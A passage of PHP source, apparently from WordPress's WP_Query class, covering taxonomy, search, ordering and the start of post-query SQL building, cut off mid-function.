if ( is_array( $query_vars['post_status'] ) ) {
$query_vars['post_status'] = array_map( 'sanitize_key', array_unique( $query_vars['post_status'] ) );
sort( $query_vars['post_status'] );
} else {
$query_vars['post_status'] = preg_replace( '|[^a-z0-9_,-]|', '', $query_vars['post_status'] );
}
}
if ( $this->is_posts_page && ( ! isset( $query_vars['withcomments'] ) || ! $query_vars['withcomments'] ) ) {
$this->is_comment_feed = false;
}
$this->is_singular = $this->is_single || $this->is_page || $this->is_attachment;
// Done correcting `is_*` for 'page_on_front' and 'page_for_posts'.
if ( '404' == $query_vars['error'] ) {
$this->set_404();
}
$this->is_embed = $this->is_embed && ( $this->is_singular || $this->is_404 );
$this->query_vars_hash = md5( serialize( $this->query_vars ) );
$this->query_vars_changed = false;
/**
* Fires after the main query vars have been parsed.
*
* @since 1.5.0
*
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
do_action_ref_array( 'parse_query', array( &$this ) );
}
/**
* Parses various taxonomy related query vars.
*
* For BC, this method is not marked as protected. See [28987].
*
* @since 3.1.0
*
* @param array $query_vars The query variables. Passed by reference.
*/
public function parse_tax_query( &$query_vars ) {
if ( ! empty( $query_vars['tax_query'] ) && is_array( $query_vars['tax_query'] ) ) {
$tax_query = $query_vars['tax_query'];
} else {
$tax_query = array();
}
if ( ! empty( $query_vars['taxonomy'] ) && ! empty( $query_vars['term'] ) ) {
$tax_query[] = array(
'taxonomy' => $query_vars['taxonomy'],
'terms' => array( $query_vars['term'] ),
'field' => 'slug',
);
}
foreach ( get_taxonomies( array(), 'objects' ) as $taxonomy => $t ) {
if ( 'post_tag' === $taxonomy ) {
continue; // Handled further down in the $query_vars['tag'] block.
}
if ( $t->query_var && ! empty( $query_vars[ $t->query_var ] ) ) {
$tax_query_defaults = array(
'taxonomy' => $taxonomy,
'field' => 'slug',
);
if ( ! empty( $t->rewrite['hierarchical'] ) ) {
$query_vars[ $t->query_var ] = wp_basename( $query_vars[ $t->query_var ] );
}
$term = $query_vars[ $t->query_var ];
if ( ! is_array( $term ) ) {
$term = explode( ',', $term );
$term = array_map( 'trim', $term );
}
sort( $term );
$term = implode( ',', $term );
if ( str_contains( $term, '+' ) ) {
$terms = preg_split( '/[+]+/', $term );
foreach ( $terms as $term ) {
$tax_query[] = array_merge(
$tax_query_defaults,
array(
'terms' => array( $term ),
)
);
}
} else {
$tax_query[] = array_merge(
$tax_query_defaults,
array(
'terms' => preg_split( '/[,]+/', $term ),
)
);
}
}
}
// If query string 'cat' is an array, implode it.
if ( is_array( $query_vars['cat'] ) ) {
$query_vars['cat'] = implode( ',', $query_vars['cat'] );
}
// Category stuff.
if ( ! empty( $query_vars['cat'] ) && ! $this->is_singular ) {
$cat_in = array();
$cat_not_in = array();
$cat_array = preg_split( '/[,\s]+/', urldecode( $query_vars['cat'] ) );
$cat_array = array_map( 'intval', $cat_array );
sort( $cat_array );
$query_vars['cat'] = implode( ',', $cat_array );
foreach ( $cat_array as $cat ) {
if ( $cat > 0 ) {
$cat_in[] = $cat;
} elseif ( $cat < 0 ) {
$cat_not_in[] = abs( $cat );
}
}
if ( ! empty( $cat_in ) ) {
$tax_query[] = array(
'taxonomy' => 'category',
'terms' => $cat_in,
'field' => 'term_id',
'include_children' => true,
);
}
if ( ! empty( $cat_not_in ) ) {
$tax_query[] = array(
'taxonomy' => 'category',
'terms' => $cat_not_in,
'field' => 'term_id',
'operator' => 'NOT IN',
'include_children' => true,
);
}
unset( $cat_array, $cat_in, $cat_not_in );
}
if ( ! empty( $query_vars['category__and'] ) && 1 === count( (array) $query_vars['category__and'] ) ) {
$query_vars['category__and'] = (array) $query_vars['category__and'];
if ( ! isset( $query_vars['category__in'] ) ) {
$query_vars['category__in'] = array();
}
$query_vars['category__in'][] = absint( reset( $query_vars['category__and'] ) );
unset( $query_vars['category__and'] );
}
if ( ! empty( $query_vars['category__in'] ) ) {
$query_vars['category__in'] = array_map( 'absint', array_unique( (array) $query_vars['category__in'] ) );
sort( $query_vars['category__in'] );
$tax_query[] = array(
'taxonomy' => 'category',
'terms' => $query_vars['category__in'],
'field' => 'term_id',
'include_children' => false,
);
}
if ( ! empty( $query_vars['category__not_in'] ) ) {
$query_vars['category__not_in'] = array_map( 'absint', array_unique( (array) $query_vars['category__not_in'] ) );
sort( $query_vars['category__not_in'] );
$tax_query[] = array(
'taxonomy' => 'category',
'terms' => $query_vars['category__not_in'],
'operator' => 'NOT IN',
'include_children' => false,
);
}
if ( ! empty( $query_vars['category__and'] ) ) {
$query_vars['category__and'] = array_map( 'absint', array_unique( (array) $query_vars['category__and'] ) );
sort( $query_vars['category__and'] );
$tax_query[] = array(
'taxonomy' => 'category',
'terms' => $query_vars['category__and'],
'field' => 'term_id',
'operator' => 'AND',
'include_children' => false,
);
}
// If query string 'tag' is array, implode it.
if ( is_array( $query_vars['tag'] ) ) {
$query_vars['tag'] = implode( ',', $query_vars['tag'] );
}
// Tag stuff.
if ( '' !== $query_vars['tag'] && ! $this->is_singular && $this->query_vars_changed ) {
if ( str_contains( $query_vars['tag'], ',' ) ) {
// @todo Handle normalizing `tag` query string.
$tags = preg_split( '/[,\r\n\t ]+/', $query_vars['tag'] );
foreach ( (array) $tags as $tag ) {
$tag = sanitize_term_field( 'slug', $tag, 0, 'post_tag', 'db' );
$query_vars['tag_slug__in'][] = $tag;
sort( $query_vars['tag_slug__in'] );
}
} elseif ( preg_match( '/[+\r\n\t ]+/', $query_vars['tag'] ) || ! empty( $query_vars['cat'] ) ) {
$tags = preg_split( '/[+\r\n\t ]+/', $query_vars['tag'] );
foreach ( (array) $tags as $tag ) {
$tag = sanitize_term_field( 'slug', $tag, 0, 'post_tag', 'db' );
$query_vars['tag_slug__and'][] = $tag;
}
} else {
$query_vars['tag'] = sanitize_term_field( 'slug', $query_vars['tag'], 0, 'post_tag', 'db' );
$query_vars['tag_slug__in'][] = $query_vars['tag'];
sort( $query_vars['tag_slug__in'] );
}
}
if ( ! empty( $query_vars['tag_id'] ) ) {
$query_vars['tag_id'] = absint( $query_vars['tag_id'] );
$tax_query[] = array(
'taxonomy' => 'post_tag',
'terms' => $query_vars['tag_id'],
);
}
if ( ! empty( $query_vars['tag__in'] ) ) {
$query_vars['tag__in'] = array_map( 'absint', array_unique( (array) $query_vars['tag__in'] ) );
sort( $query_vars['tag__in'] );
$tax_query[] = array(
'taxonomy' => 'post_tag',
'terms' => $query_vars['tag__in'],
);
}
if ( ! empty( $query_vars['tag__not_in'] ) ) {
$query_vars['tag__not_in'] = array_map( 'absint', array_unique( (array) $query_vars['tag__not_in'] ) );
sort( $query_vars['tag__not_in'] );
$tax_query[] = array(
'taxonomy' => 'post_tag',
'terms' => $query_vars['tag__not_in'],
'operator' => 'NOT IN',
);
}
if ( ! empty( $query_vars['tag__and'] ) ) {
$query_vars['tag__and'] = array_map( 'absint', array_unique( (array) $query_vars['tag__and'] ) );
sort( $query_vars['tag__and'] );
$tax_query[] = array(
'taxonomy' => 'post_tag',
'terms' => $query_vars['tag__and'],
'operator' => 'AND',
);
}
if ( ! empty( $query_vars['tag_slug__in'] ) ) {
$query_vars['tag_slug__in'] = array_map( 'sanitize_title_for_query', array_unique( (array) $query_vars['tag_slug__in'] ) );
sort( $query_vars['tag_slug__in'] );
$tax_query[] = array(
'taxonomy' => 'post_tag',
'terms' => $query_vars['tag_slug__in'],
'field' => 'slug',
);
}
if ( ! empty( $query_vars['tag_slug__and'] ) ) {
$query_vars['tag_slug__and'] = array_map( 'sanitize_title_for_query', array_unique( (array) $query_vars['tag_slug__and'] ) );
sort( $query_vars['tag_slug__and'] );
$tax_query[] = array(
'taxonomy' => 'post_tag',
'terms' => $query_vars['tag_slug__and'],
'field' => 'slug',
'operator' => 'AND',
);
}
$this->tax_query = new WP_Tax_Query( $tax_query );
/**
* Fires after taxonomy-related query vars have been parsed.
*
* @since 3.7.0
*
* @param WP_Query $query The WP_Query instance.
*/
do_action( 'parse_tax_query', $this );
}
/**
* Generates SQL for the WHERE clause based on passed search terms.
*
* @since 3.7.0
*
* @global wpdb $wpdb WordPress database abstraction object.
*
* @param array $query_vars Query variables.
* @return string WHERE clause.
*/
protected function parse_search( &$query_vars ) {
global $wpdb;
$search = '';
// Added slashes screw with quote grouping when done early, so done later.
$query_vars['s'] = stripslashes( $query_vars['s'] );
if ( empty( $_GET['s'] ) && $this->is_main_query() ) {
$query_vars['s'] = urldecode( $query_vars['s'] );
}
// There are no line breaks in <input /> fields.
$query_vars['s'] = str_replace( array( "\r", "\n" ), '', $query_vars['s'] );
$query_vars['search_terms_count'] = 1;
if ( ! empty( $query_vars['sentence'] ) ) {
$query_vars['search_terms'] = array( $query_vars['s'] );
} else {
if ( preg_match_all( '/".*?("|$)|((?<=[\t ",+])|^)[^\t ",+]+/', $query_vars['s'], $matches ) ) {
$query_vars['search_terms_count'] = count( $matches[0] );
$query_vars['search_terms'] = $this->parse_search_terms( $matches[0] );
// If the search string has only short terms or stopwords, or is 10+ terms long, match it as sentence.
if ( empty( $query_vars['search_terms'] ) || count( $query_vars['search_terms'] ) > 9 ) {
$query_vars['search_terms'] = array( $query_vars['s'] );
}
} else {
$query_vars['search_terms'] = array( $query_vars['s'] );
}
}
$n = ! empty( $query_vars['exact'] ) ? '' : '%';
$searchand = '';
$query_vars['search_orderby_title'] = array();
$default_search_columns = array( 'post_title', 'post_excerpt', 'post_content' );
$search_columns = ! empty( $query_vars['search_columns'] ) ? $query_vars['search_columns'] : $default_search_columns;
if ( ! is_array( $search_columns ) ) {
$search_columns = array( $search_columns );
}
/**
* Filters the columns to search in a WP_Query search.
*
* The supported columns are `post_title`, `post_excerpt` and `post_content`.
* They are all included by default.
*
* @since 6.2.0
*
* @param string[] $search_columns Array of column names to be searched.
* @param string $search Text being searched.
* @param WP_Query $query The current WP_Query instance.
*/
$search_columns = (array) apply_filters( 'post_search_columns', $search_columns, $query_vars['s'], $this );
// Use only supported search columns.
$search_columns = array_intersect( $search_columns, $default_search_columns );
if ( empty( $search_columns ) ) {
$search_columns = $default_search_columns;
}
/**
* Filters the prefix that indicates that a search term should be excluded from results.
*
* @since 4.7.0
*
* @param string $exclusion_prefix The prefix. Default '-'. Returning
* an empty value disables exclusions.
*/
$exclusion_prefix = apply_filters( 'wp_query_search_exclusion_prefix', '-' );
foreach ( $query_vars['search_terms'] as $term ) {
// If there is an $exclusion_prefix, terms prefixed with it should be excluded.
$exclude = $exclusion_prefix && str_starts_with( $term, $exclusion_prefix );
if ( $exclude ) {
$like_op = 'NOT LIKE';
$andor_op = 'AND';
$term = substr( $term, 1 );
} else {
$like_op = 'LIKE';
$andor_op = 'OR';
}
if ( $n && ! $exclude ) {
$like = '%' . $wpdb->esc_like( $term ) . '%';
$query_vars['search_orderby_title'][] = $wpdb->prepare( "{$wpdb->posts}.post_title LIKE %s", $like );
}
$like = $n . $wpdb->esc_like( $term ) . $n;
$search_columns_parts = array();
foreach ( $search_columns as $search_column ) {
$search_columns_parts[ $search_column ] = $wpdb->prepare( "({$wpdb->posts}.$search_column $like_op %s)", $like );
}
if ( ! empty( $this->allow_query_attachment_by_filename ) ) {
$search_columns_parts['attachment'] = $wpdb->prepare( "(sq1.meta_value $like_op %s)", $like );
}
$search .= "$searchand(" . implode( " $andor_op ", $search_columns_parts ) . ')';
$searchand = ' AND ';
}
if ( ! empty( $search ) ) {
$search = " AND ({$search}) ";
if ( ! is_user_logged_in() ) {
$search .= " AND ({$wpdb->posts}.post_password = '') ";
}
}
return $search;
}
/**
* Checks if the terms are suitable for searching.
*
* Uses an array of stopwords (terms) that are excluded from the separate
* term matching when searching for posts. The list of English stopwords is
* the approximate search engines list, and is translatable.
*
* @since 3.7.0
*
* @param string[] $terms Array of terms to check.
* @return string[] Terms that are not stopwords.
*/
protected function parse_search_terms( $terms ) {
$strtolower = function_exists( 'mb_strtolower' ) ? 'mb_strtolower' : 'strtolower';
$checked = array();
$stopwords = $this->get_search_stopwords();
foreach ( $terms as $term ) {
// Keep before/after spaces when term is for exact match.
if ( preg_match( '/^".+"$/', $term ) ) {
$term = trim( $term, "\"'" );
} else {
$term = trim( $term, "\"' " );
}
// Avoid single A-Z and single dashes.
if ( ! $term || ( 1 === strlen( $term ) && preg_match( '/^[a-z\-]$/i', $term ) ) ) {
continue;
}
if ( in_array( call_user_func( $strtolower, $term ), $stopwords, true ) ) {
continue;
}
$checked[] = $term;
}
return $checked;
}
/**
* Retrieves stopwords used when parsing search terms.
*
* @since 3.7.0
*
* @return string[] Stopwords.
*/
protected function get_search_stopwords() {
if ( isset( $this->stopwords ) ) {
return $this->stopwords;
}
/*
* translators: This is a comma-separated list of very common words that should be excluded from a search,
* like a, an, and the. These are usually called "stopwords". You should not simply translate these individual
* words into your language. Instead, look for and provide commonly accepted stopwords in your language.
*/
$words = explode(
',',
_x(
'about,an,are,as,at,be,by,com,for,from,how,in,is,it,of,on,or,that,the,this,to,was,what,when,where,who,will,with,www',
'Comma-separated list of search stopwords in your language'
)
);
$stopwords = array();
foreach ( $words as $word ) {
$word = trim( $word, "\r\n\t " );
if ( $word ) {
$stopwords[] = $word;
}
}
/**
* Filters stopwords used when parsing search terms.
*
* @since 3.7.0
*
* @param string[] $stopwords Array of stopwords.
*/
$this->stopwords = apply_filters( 'wp_search_stopwords', $stopwords );
return $this->stopwords;
}
/**
* Generates SQL for the ORDER BY condition based on passed search terms.
*
* @since 3.7.0
*
* @global wpdb $wpdb WordPress database abstraction object.
*
* @param array $query_vars Query variables.
* @return string ORDER BY clause.
*/
protected function parse_search_order( &$query_vars ) {
global $wpdb;
if ( $query_vars['search_terms_count'] > 1 ) {
$num_terms = count( $query_vars['search_orderby_title'] );
// If the search terms contain negative queries, don't bother ordering by sentence matches.
$like = '';
if ( ! preg_match( '/(?:\s|^)\-/', $query_vars['s'] ) ) {
$like = '%' . $wpdb->esc_like( $query_vars['s'] ) . '%';
}
$search_orderby = '';
// Sentence match in 'post_title'.
if ( $like ) {
$search_orderby .= $wpdb->prepare( "WHEN {$wpdb->posts}.post_title LIKE %s THEN 1 ", $like );
}
/*
* Sanity limit, sort as sentence when more than 6 terms
* (few searches are longer than 6 terms and most titles are not).
*/
if ( $num_terms < 7 ) {
// All words in title.
$search_orderby .= 'WHEN ' . implode( ' AND ', $query_vars['search_orderby_title'] ) . ' THEN 2 ';
// Any word in title, not needed when $num_terms == 1.
if ( $num_terms > 1 ) {
$search_orderby .= 'WHEN ' . implode( ' OR ', $query_vars['search_orderby_title'] ) . ' THEN 3 ';
}
}
// Sentence match in 'post_content' and 'post_excerpt'.
if ( $like ) {
$search_orderby .= $wpdb->prepare( "WHEN {$wpdb->posts}.post_excerpt LIKE %s THEN 4 ", $like );
$search_orderby .= $wpdb->prepare( "WHEN {$wpdb->posts}.post_content LIKE %s THEN 5 ", $like );
}
if ( $search_orderby ) {
$search_orderby = '(CASE ' . $search_orderby . 'ELSE 6 END)';
}
} else {
// Single word or sentence search.
$search_orderby = reset( $query_vars['search_orderby_title'] ) . ' DESC';
}
return $search_orderby;
}
/**
* Converts the given orderby alias (if allowed) to a properly-prefixed value.
*
* @since 4.0.0
*
* @global wpdb $wpdb WordPress database abstraction object.
*
* @param string $orderby Alias for the field to order by.
* @return string|false Table-prefixed value to used in the ORDER clause. False otherwise.
*/
protected function parse_orderby( $orderby ) {
global $wpdb;
// Used to filter values.
$allowed_keys = array(
'post_name',
'post_author',
'post_date',
'post_title',
'post_modified',
'post_parent',
'post_type',
'name',
'author',
'date',
'title',
'modified',
'parent',
'type',
'ID',
'menu_order',
'comment_count',
'rand',
'post__in',
'post_parent__in',
'post_name__in',
);
$primary_meta_key = '';
$primary_meta_query = false;
$meta_clauses = $this->meta_query->get_clauses();
if ( ! empty( $meta_clauses ) ) {
$primary_meta_query = reset( $meta_clauses );
if ( ! empty( $primary_meta_query['key'] ) ) {
$primary_meta_key = $primary_meta_query['key'];
$allowed_keys[] = $primary_meta_key;
}
$allowed_keys[] = 'meta_value';
$allowed_keys[] = 'meta_value_num';
$allowed_keys = array_merge( $allowed_keys, array_keys( $meta_clauses ) );
}
// If RAND() contains a seed value, sanitize and add to allowed keys.
$rand_with_seed = false;
if ( preg_match( '/RAND\(([0-9]+)\)/i', $orderby, $matches ) ) {
$orderby = sprintf( 'RAND(%s)', (int) $matches[1] );
$allowed_keys[] = $orderby;
$rand_with_seed = true;
}
if ( ! in_array( $orderby, $allowed_keys, true ) ) {
return false;
}
$orderby_clause = '';
switch ( $orderby ) {
case 'post_name':
case 'post_author':
case 'post_date':
case 'post_title':
case 'post_modified':
case 'post_parent':
case 'post_type':
case 'ID':
case 'menu_order':
case 'comment_count':
$orderby_clause = "{$wpdb->posts}.{$orderby}";
break;
case 'rand':
$orderby_clause = 'RAND()';
break;
case $primary_meta_key:
case 'meta_value':
if ( ! empty( $primary_meta_query['type'] ) ) {
$orderby_clause = "CAST({$primary_meta_query['alias']}.meta_value AS {$primary_meta_query['cast']})";
} else {
$orderby_clause = "{$primary_meta_query['alias']}.meta_value";
}
break;
case 'meta_value_num':
$orderby_clause = "{$primary_meta_query['alias']}.meta_value+0";
break;
case 'post__in':
if ( ! empty( $this->query_vars['post__in'] ) ) {
$orderby_clause = "FIELD({$wpdb->posts}.ID," . implode( ',', array_map( 'absint', $this->query_vars['post__in'] ) ) . ')';
}
break;
case 'post_parent__in':
if ( ! empty( $this->query_vars['post_parent__in'] ) ) {
$orderby_clause = "FIELD( {$wpdb->posts}.post_parent," . implode( ', ', array_map( 'absint', $this->query_vars['post_parent__in'] ) ) . ' )';
}
break;
case 'post_name__in':
if ( ! empty( $this->query_vars['post_name__in'] ) ) {
$post_name__in = array_map( 'sanitize_title_for_query', $this->query_vars['post_name__in'] );
$post_name__in_string = "'" . implode( "','", $post_name__in ) . "'";
$orderby_clause = "FIELD( {$wpdb->posts}.post_name," . $post_name__in_string . ' )';
}
break;
default:
if ( array_key_exists( $orderby, $meta_clauses ) ) {
// $orderby corresponds to a meta_query clause.
$meta_clause = $meta_clauses[ $orderby ];
$orderby_clause = "CAST({$meta_clause['alias']}.meta_value AS {$meta_clause['cast']})";
} elseif ( $rand_with_seed ) {
$orderby_clause = $orderby;
} else {
// Default: order by post field.
$orderby_clause = "{$wpdb->posts}.post_" . sanitize_key( $orderby );
}
break;
}
return $orderby_clause;
}
/**
* Parse an 'order' query variable and cast it to ASC or DESC as necessary.
*
* @since 4.0.0
*
* @param string $order The 'order' query variable.
* @return string The sanitized 'order' query variable.
*/
protected function parse_order( $order ) {
if ( ! is_string( $order ) || empty( $order ) ) {
return 'DESC';
}
if ( 'ASC' === strtoupper( $order ) ) {
return 'ASC';
} else {
return 'DESC';
}
}
/**
* Sets the 404 property and saves whether query is feed.
*
* @since 2.0.0
*/
public function set_404() {
$is_feed = $this->is_feed;
$this->init_query_flags();
$this->is_404 = true;
$this->is_feed = $is_feed;
/**
* Fires after a 404 is triggered.
*
* @since 5.5.0
*
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
do_action_ref_array( 'set_404', array( $this ) );
}
/**
* Retrieves the value of a query variable.
*
* @since 1.5.0
* @since 3.9.0 The `$default_value` argument was introduced.
*
* @param string $query_var Query variable key.
* @param mixed $default_value Optional. Value to return if the query variable is not set.
* Default empty string.
* @return mixed Contents of the query variable.
*/
public function get( $query_var, $default_value = '' ) {
if ( isset( $this->query_vars[ $query_var ] ) ) {
return $this->query_vars[ $query_var ];
}
return $default_value;
}
/**
* Sets the value of a query variable.
*
* @since 1.5.0
*
* @param string $query_var Query variable key.
* @param mixed $value Query variable value.
*/
public function set( $query_var, $value ) {
$this->query_vars[ $query_var ] = $value;
}
/**
* Retrieves an array of posts based on query variables.
*
* There are a few filters and actions that can be used to modify the post
* database query.
*
* @since 1.5.0
*
* @global wpdb $wpdb WordPress database abstraction object.
*
* @return WP_Post[]|int[] Array of post objects or post IDs.
*/
public function get_posts() {
global $wpdb;
$this->parse_query();
/**
* Fires after the query variable object is created, but before the actual query is run.
*
* Note: If using conditional tags, use the method versions within the passed instance
* (e.g. $this->is_main_query() instead of is_main_query()). This is because the functions
* like is_main_query() test against the global $wp_query instance, not the passed one.
*
* @since 2.0.0
*
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
do_action_ref_array( 'pre_get_posts', array( &$this ) );
// Locally scoped reference for easy of use.
$query_vars = &$this->query_vars;
// Fill again in case 'pre_get_posts' unset some vars.
$query_vars = $this->fill_query_vars( $query_vars );
/**
* Filters whether an attachment query should include filenames or not.
*
* @since 6.0.3
*
* @param bool $allow_query_attachment_by_filename Whether or not to include filenames.
*/
$this->allow_query_attachment_by_filename = apply_filters( 'wp_allow_query_attachment_by_filename', false );
remove_all_filters( 'wp_allow_query_attachment_by_filename' );
// Parse meta query.
$this->meta_query = new WP_Meta_Query();
$this->meta_query->parse_query_vars( $query_vars );
// Set a flag if a 'pre_get_posts' hook changed the query vars.
$hash = md5( serialize( $this->query_vars ) );
if ( $hash !== $this->query_vars_hash ) {
$this->query_vars_changed = true;
$this->query_vars_hash = $hash;
}
unset( $hash );
// First let's clear some variables.
$distinct = '';
$whichauthor = '';
$whichmimetype = '';
$where = '';
$limits = '';
$join = '';
$search = '';
$groupby = '';
$post_status_join = false;
$page = 1;
if ( isset( $query_vars['caller_get_posts'] ) ) {
_deprecated_argument(
'WP_Query',
'3.1.0',
sprintf(
/* translators: 1: caller_get_posts, 2: ignore_sticky_posts */
__( '%1$s is deprecated. Use %2$s instead.' ),
'<code>caller_get_posts</code>',
'<code>ignore_sticky_posts</code>'
)
);
if ( ! isset( $query_vars['ignore_sticky_posts'] ) ) {
$query_vars['ignore_sticky_posts'] = $query_vars['caller_get_posts'];
}
}
if ( ! isset( $query_vars['ignore_sticky_posts'] ) ) {
$query_vars['ignore_sticky_posts'] = false;
}
if ( ! isset( $query_vars['suppress_filters'] ) ) {
$query_vars['suppress_filters'] = false;
}
if ( ! isset( $query_vars['cache_results'] ) ) {
$query_vars['cache_results'] = true;
}
if ( ! isset( $query_vars['update_post_term_cache'] ) ) {
$query_vars['update_post_term_cache'] = true;
}
if ( ! isset( $query_vars['update_menu_item_cache'] ) ) {
$query_vars['update_menu_item_cache'] = false;
}
if ( ! isset( $query_vars['lazy_load_term_meta'] ) ) {
$query_vars['lazy_load_term_meta'] = $query_vars['update_post_term_cache'];
} elseif ( $query_vars['lazy_load_term_meta'] ) { // Lazy loading term meta only works if term caches are primed.
$query_vars['update_post_term_cache'] = true;
}
if ( ! isset( $query_vars['update_post_meta_cache'] ) ) {
$query_vars['update_post_meta_cache'] = true;
}
if ( ! isset( $query_vars['post_type'] ) ) {
if ( $this->is_search ) {
$query_vars['post_type'] = 'any';
} else {
$query_vars['post_type'] = '';
}
}
$post_type = $query_vars['post_type'];
if ( empty( $query_vars['posts_per_page'] ) ) {
$query_vars['posts_per_page'] = get_option( 'posts_per_page' );
}
if ( isset( $query_vars['showposts'] ) && $query_vars['showposts'] ) {
$query_vars['showposts'] = (int) $query_vars['showposts'];
$query_vars['posts_per_page'] = $query_vars['showposts'];
}
if ( ( isset( $query_vars['posts_per_archive_page'] ) && 0 != $query_vars['posts_per_archive_page'] ) && ( $this->is_archive || $this->is_search ) ) {
$query_vars['posts_per_page'] = $query_vars['posts_per_archive_page'];
}
if ( ! isset( $query_vars['nopaging'] ) ) {
if ( -1 == $query_vars['posts_per_page'] ) {
$query_vars['nopaging'] = true;
} else {
$query_vars['nopaging'] = false;
}
}
if ( $this->is_feed ) {
// This overrides 'posts_per_page'.
if ( ! empty( $query_vars['posts_per_rss'] ) ) {
$query_vars['posts_per_page'] = $query_vars['posts_per_rss'];
} else {
$query_vars['posts_per_page'] = get_option( 'posts_per_rss' );
}
$query_vars['nopaging'] = false;
}
$query_vars['posts_per_page'] = (int) $query_vars['posts_per_page'];
if ( $query_vars['posts_per_page'] < -1 ) {
$query_vars['posts_per_page'] = abs( $query_vars['posts_per_page'] );
} elseif ( 0 === $query_vars['posts_per_page'] ) {
$query_vars['posts_per_page'] = 1;
}
if ( ! isset( $query_vars['comments_per_page'] ) || 0 == $query_vars['comments_per_page'] ) {
$query_vars['comments_per_page'] = get_option( 'comments_per_page' );
}
if ( $this->is_home && ( empty( $this->query ) || 'true' === $query_vars['preview'] ) && ( 'page' === get_option( 'show_on_front' ) ) && get_option( 'page_on_front' ) ) {
$this->is_page = true;
$this->is_home = false;
$query_vars['page_id'] = get_option( 'page_on_front' );
}
if ( isset( $query_vars['page'] ) ) {
$query_vars['page'] = is_scalar( $query_vars['page'] ) ? absint( trim( $query_vars['page'], '/' ) ) : 0;
}
// If true, forcibly turns off SQL_CALC_FOUND_ROWS even when limits are present.
if ( isset( $query_vars['no_found_rows'] ) ) {
$query_vars['no_found_rows'] = (bool) $query_vars['no_found_rows'];
} else {
$query_vars['no_found_rows'] = false;
}
switch ( $query_vars['fields'] ) {
case 'ids':
$fields = "{$wpdb->posts}.ID";
break;
case 'id=>parent':
$fields = "{$wpdb->posts}.ID, {$wpdb->posts}.post_parent";
break;
case '':
/*
* Set the default to 'all'.
*
* This is used in `WP_Query::the_post` to determine if the
* entire post object has been queried.
*/
$query_vars['fields'] = 'all';
// Falls through.
default:
$fields = "{$wpdb->posts}.*";
}
if ( '' !== $query_vars['menu_order'] ) {
$where .= " AND {$wpdb->posts}.menu_order = " . $query_vars['menu_order'];
}
// The "m" parameter is meant for months but accepts datetimes of varying specificity.
if ( $query_vars['m'] ) {
$where .= " AND YEAR({$wpdb->posts}.post_date)=" . substr( $query_vars['m'], 0, 4 );
if ( strlen( $query_vars['m'] ) > 5 ) {
$where .= " AND MONTH({$wpdb->posts}.post_date)=" . substr( $query_vars['m'], 4, 2 );
}
if ( strlen( $query_vars['m'] ) > 7 ) {
$where .= " AND DAYOFMONTH({$wpdb->posts}.post_date)=" . substr( $query_vars['m'], 6, 2 );
}
if ( strlen( $query_vars['m'] ) > 9 ) {
$where .= " AND HOUR({$wpdb->posts}.post_date)=" . substr( $query_vars['m'], 8, 2 );
}
if ( strlen( $query_vars['m'] ) > 11 ) {
$where .= " AND MINUTE({$wpdb->posts}.post_date)=" . substr( $query_vars['m'], 10, 2 );
}
if ( strlen( $query_vars['m'] ) > 13 ) {
$where .= " AND SECOND({$wpdb->posts}.post_date)=" . substr( $query_vars['m'], 12, 2 );
}
}
// Handle the other individual date parameters.
$date_parameters = array();
if ( '' !== $query_vars['hour'] ) {
$date_parameters['hour'] = $query_vars['hour'];
}
if ( '' !== $query_vars['minute'] ) {
$date_parameters['minute'] = $query_vars['minute'];
}
if ( '' !== $query_vars['second'] ) {
$date_parameters['second'] = $query_vars['second'];
}
if ( $query_vars['year'] ) {
$date_parameters['year'] = $query_vars['year'];
}
if ( $query_vars['monthnum'] ) {
$date_parameters['monthnum'] = $query_vars['monthnum'];
}
if ( $query_vars['w'] ) {
$date_parameters['week'] = $query_vars['w'];
}
if ( $query_vars['day'] ) {
$date_parameters['day'] = $query_vars['day'];
}
if ( $date_parameters ) {
$date_query = new WP_Date_Query( array( $date_parameters ) );
$where .= $date_query->get_sql();
}
unset( $date_parameters, $date_query );
// Handle complex date queries.
if ( ! empty( $query_vars['date_query'] ) ) {
$this->date_query = new WP_Date_Query( $query_vars['date_query'] );
$where .= $this->date_query->get_sql();
}
// If we've got a post_type AND it's not "any" post_type.
if ( ! empty( $query_vars['post_type'] ) && 'any' !== $query_vars['post_type'] ) {
foreach ( (array) $query_vars['post_type'] as $_post_type ) {
$ptype_obj = get_post_type_object( $_post_type );
if ( ! $ptype_obj || ! $ptype_obj->query_var || empty( $query_vars[ $ptype_obj->query_var ] ) ) {
continue;
}
if ( ! $ptype_obj->hierarchical ) {
// Non-hierarchical post types can directly use 'name'.
$query_vars['name'] = $query_vars[ $ptype_obj->query_var ];
} else {
// Hierarchical post types will operate through 'pagename'.
$query_vars['pagename'] = $query_vars[ $ptype_obj->query_var ];
$query_vars['name'] = '';
}
// Only one request for a slug is possible, this is why name & pagename are overwritten above.
break;
} // End foreach.
unset( $ptype_obj );
}
if ( '' !== $query_vars['title'] ) {
$where .= $wpdb->prepare( " AND {$wpdb->posts}.post_title = %s", stripslashes( $query_vars['title'] ) );
}
// Parameters related to 'post_name'.
if ( '' !== $query_vars['name'] ) {
$query_vars['name'] = sanitize_title_for_query( $query_vars['name'] );
$where .= " AND {$wpdb->posts}.post_name = '" . $query_vars['name'] . "'";
} elseif ( '' !== $query_vars['pagename'] ) {
if ( isset( $this->queried_object_id ) ) {
$reqpage = $this->queried_object_id;
} else {
if ( 'page' !== $query_vars['post_type'] ) {
foreach ( (array) $query_vars['post_type'] as $_post_type ) {
$ptype_obj = get_post_type_object( $_post_type );
if ( ! $ptype_obj || ! $ptype_obj->hierarchical ) {
continue;
}
$reqpage = get_page_by_path( $query_vars['pagename'], OBJECT, $_post_type );
if ( $reqpage ) {
break;
}
}
unset( $ptype_obj );
} else {
$reqpage = get_page_by_path( $query_vars['pagename'] );
}
if ( ! empty( $reqpage ) ) {
$reqpage = $reqpage->ID;
} else {
$reqpage = 0;
}
}
$page_for_posts = get_option( 'page_for_posts' );
if ( ( 'page' !== get_option( 'show_on_front' ) ) || empty( $page_for_posts ) || ( $reqpage != $page_for_posts ) ) {
$query_vars['pagename'] = sanitize_title_for_query( wp_basename( $query_vars['pagename'] ) );
$query_vars['name'] = $query_vars['pagename'];
$where .= " AND ({$wpdb->posts}.ID = '$reqpage')";
$reqpage_obj = get_post( $reqpage );
if ( is_object( $reqpage_obj ) && 'attachment' === $reqpage_obj->post_type ) {
$this->is_attachment = true;
$post_type = 'attachment';
$query_vars['post_type'] = 'attachment';
$this->is_page = true;
$query_vars['attachment_id'] = $reqpage;
}
}
} elseif ( '' !== $query_vars['attachment'] ) {
